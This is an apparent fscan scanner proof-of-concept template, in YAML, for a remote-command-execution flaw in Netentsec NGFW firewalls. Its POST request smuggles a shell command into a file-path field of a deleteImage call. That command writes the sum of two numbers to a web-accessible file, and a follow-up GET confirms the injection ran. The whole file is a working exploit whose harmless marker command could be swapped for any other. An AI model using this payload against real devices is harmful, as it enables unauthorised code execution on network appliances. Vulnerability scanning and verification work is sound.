mirror of https://github.com/qwqdanchun/fscan.git
18 lines
705 B
YAML
18 lines
705 B
YAML
|
name: poc-yaml-netentsec-ngfw-rce
|
||
|
set:
|
||
|
r1: randomLowercase(4)
|
||
|
r2: randomLowercase(4)
|
||
|
r3: randomInt(800000000, 1000000000)
|
||
|
r4: randomInt(800000000, 1000000000)
|
||
|
rules:
|
||
|
- method: POST
|
||
|
path: /directdata/direct/router
|
||
|
body: {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
|
||
|
expression: response.status == 200
|
||
|
- method: GET
|
||
|
path: /{{r2}}
|
||
|
expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4)))
|
||
|
detail:
|
||
|
author: jingling(https://github.com/shmilylty)
|
||
|
links:
|
||
|
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|